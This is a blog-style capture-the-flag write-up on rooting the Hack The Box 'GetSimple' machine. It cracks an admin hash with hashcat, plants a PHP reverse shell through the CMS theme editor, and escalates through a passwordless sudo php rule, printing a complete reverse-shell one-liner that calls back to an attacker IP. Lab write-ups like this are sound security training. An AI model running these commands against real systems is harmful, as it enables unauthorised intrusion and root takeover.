R.A.V.E.N. Exploit Walkthrough: Rooting GetSimpleCMS via Theme Template Injection


Welcome to another breakdown in the R.A.V.E.N. series — a branded, modular approach to privilege escalation. Today, we're dissecting a black box engagement on HTB’s “GetSimple” machine, where remote exploitation leads to root access through theme template manipulation in a flat-file CMS.
Reconnaissance: Mapping the Terrain
Our initial scans painted a predictable picture:
nmap flagged open ports:
22
(OpenSSH) and80
(Apache httpd).nikto discovered
/admin.xml
containing a hash nested inside/data/users/
.gobuster confirmed relevant directories:
/admin/
,/data/
.curl scraping gave no extra intel in the source code.
Credentials Unearthed
Extracted hash:
d033e22ae348aeb5660fc2140aec35850c4da997
Cracked with Hashcat using rockyou:
echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > hash.txt
hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Result: admin:admin
Initial Foothold: Bypassing Upload Restrictions
Login access to /admin
yielded no direct file upload functionality — and GetSimpleCMS refused to parse PHP within page content. Enter the workaround: using the Theme Editor.
Injected PentestMonkey's PHP reverse shell into a
.php
file under the active theme.With a netcat listener (
nc -lnvp 5555
) running, a quick page refresh dropped us into the box.
Shell Upgrade
TTY was unstable post-access, so we upgraded it:
python3 -c 'import pty; pty.spawn("/bin/bash")'
And just like that — user.txt
found in /home/<user>
.
Privilege Escalation: The Hidden Misconfig
Standard enumeration with LinEnum revealed a gem:
User can sudo /usr/bin/php without password
Root payload:
sudo /usr/bin/php -r '$sock=fsockopen("10.10.14.1",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
Reverse shell listener:
nc -lnvp 4444
And boom — root.txt
retrieved.
Key Takeaways
Flat-file CMSs like GetSimple don’t rely on databases, which shifts your attack surface.
No file uploads? Try theme injection.
Don’t ignore hashed credentials in public-facing XML.
Sudo misconfigurations can be gold — run
sudo -l
religiously.
Subscribe to my newsletter
Read articles from Brad Harris directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Brad Harris
Brad Harris
I am extremely passionate about staying updated and enhancing my skills to safeguard any organizations' assets in the dynamic cloud computing environment.